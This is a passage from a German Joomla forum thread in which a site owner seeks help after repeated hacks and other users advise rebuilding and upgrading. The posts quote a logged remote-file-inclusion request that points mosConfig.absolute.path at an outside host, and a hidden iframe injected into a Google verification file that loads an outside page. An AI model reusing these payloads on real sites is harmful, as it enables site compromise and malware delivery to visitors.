+ Antworten
Seite 3 von 3 ErsteErste 1 2 3
Ergebnis 21 bis 27 von 27

Thema: Seite schon wieder gehackt !

  1. #21
    Kommt häufiger vorbei
    Registriert seit
    05.10.2005
    Beiträge
    252
    Bedankte sich
    8
    Erhielt 4 Danksagungen
    in 4 Beiträgen

    Standard

    diesmal ging es wieder über einen normalen Linkaufruf.
    Und die Componente ( com_letterman )hab ich noch nicht mal installiert.


    GET /index2.php?option=com_content&do_pdf=1&id=4%20%20//index.php?option=com_letterman&task=view&Itemid=&m osConfig.absolute.path=http://team-sekip.cc/Source/sikat? HTTP/1.1" 200 27 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3

  2. #22
    Moderator Avatar von flotte
    Registriert seit
    20.03.2005
    Ort
    Neustadt
    Beiträge
    5.188
    Bedankte sich
    63
    Erhielt 1.224 Danksagungen
    in 1.071 Beiträgen

    Standard

    Wenn die Komponente nicht installiert ist, kann man darüber auch keine Angriffe tätigen. Das im Log ein 200er-Return-Code vom Webserver geliefert wurde (=erfolgreich) hängt damit zusammen, das der Aufruf ja über die index.php des Joomla erfolgte und nicht als Direktaufruf zu einem Letterman-Script. Weil die index.php sicherlich existiert, wurde ein erfolgreicher Zugriff gemeldet, der in Wirklichkeit aber nichts bewirkt.

  3. #23
    Kommt häufiger vorbei
    Registriert seit
    05.10.2005
    Beiträge
    252
    Bedankte sich
    8
    Erhielt 4 Danksagungen
    in 4 Beiträgen

    Standard

    und weiter gehts :-(

    unsere Seite ist jetzt eine :

    "Als attakierend gemeldete Website" aufgeführt, wenn man dessen URL eingibt.


    komischerweise muss sich jemand bei Google Webmastertools NEU angemeldet haben, unsere Website ** LINK ENTFERNT ** angegeben haben und die nötige verify Datei auf unseren Webspace bekommen haben.

    Somit war der Eigentum bestätigt.

    Dies erfolgte am 03.03.2010, was ich anhand des Zeitstempels sehe.
    google3f833fa1d32geändert.html

    Danach wurde in der Google verify Datein der Code abgeändert in :


    <iframe src="http://nsfer.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>


    Als Google prüfte, haben die natürlich gleich gesehen das da was nicht stimmt.



    Das kann doch schon nicht mehr autmotisiert gemacht worden sein, oder ?


    Danke
    Geändert von blackice2999 (18.03.2010 um 22:52 Uhr)

  4. #24
    Kommt häufiger vorbei
    Registriert seit
    12.11.2008
    Ort
    ziemlich im Süden der Republik
    Beiträge
    381
    Bedankte sich
    16
    Erhielt 91 Danksagungen
    in 72 Beiträgen

    Standard

    Hallo,

    ob so etwas automatisiert gemacht worden ist, oder nicht mag ich nicht beurteilen aber es gibt bestimmt noch Spammer mit zuviel Zeit. Irgendetwas passt vielleicht auch mit Deinem Backup nicht, oder Du hast nicht alles befolgt, was zu tun war nach dem Hack.
    Meiner Meinung nach bleibt Dir nur noch die Möglichkeit, alles zu löschen und neu aufzusetzen. Vorher auf alle Fälle, sofern noch nicht geschehen, den Hoster informieren, vielleicht liegt es gar nicht an deiner Seite, sondern eine andere auf dem Server ist gehackt worden und aufgrund falscher Servereinstellungen hat es nun Deines ( und möglicherweise auch andere Seiten ) mit erwischt.

    Gruß

    Chris

  5. #25
    Kommt häufiger vorbei
    Registriert seit
    05.10.2005
    Beiträge
    252
    Bedankte sich
    8
    Erhielt 4 Danksagungen
    in 4 Beiträgen

    Standard

    Wie kann man denn mit so einem Link sowas erreichen ?

    **LINK ENTFERNT **

    Text Ansicht :

    ** LINK ENTFERNT**
    Geändert von blackice2999 (18.03.2010 um 22:51 Uhr)

  6. #26
    Hat hier eine Zweitwohnung Avatar von X-Bit
    Registriert seit
    08.06.2007
    Beiträge
    1.307
    Bedankte sich
    60
    Erhielt 272 Danksagungen
    in 243 Beiträgen

    Standard

    Hmm... bist du absolut beratungsresistent?

    Die Antwort ist immer die selbige, denn es gibt keine Andere:

    HIER

    Noch einen Rat: Mach die Seite neu, gleich auf 1.5.15 weil "...ab dem 22. Juli 2009 die alte Joomla! Version 1.0 offiziell nicht mehr supported wird..."

    Wäre ein guter Moment, deine Seite ins Reine zu bringen, weil auf deinen Link Klick ich mit DER Vorgeschichte garantiert nicht!
    - ... Problem gelöst?! Mark it!
    - Joomla Umzug Lokal <-> Webspace? Easy!
    - Der "DANKE" Button ist nicht nur zur Verzierung da!

  7. Erhielt Danksagungen von:


  8. #27
    Kommt häufiger vorbei
    Registriert seit
    05.10.2005
    Beiträge
    252
    Bedankte sich
    8
    Erhielt 4 Danksagungen
    in 4 Beiträgen

    Standard

    es ist mir schon klar das ich die Sicherheits-Lücke finden muss, ich finde diese aber nicht.

    Ich habe noch nicht einmal diese Komponente com_letterman ! Und die können bereits mit einer normalen URL wo etwas dran gehängt ist die Seite knacken.

    Kopschüttel !

+ Antworten
Seite 3 von 3 ErsteErste 1 2 3

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein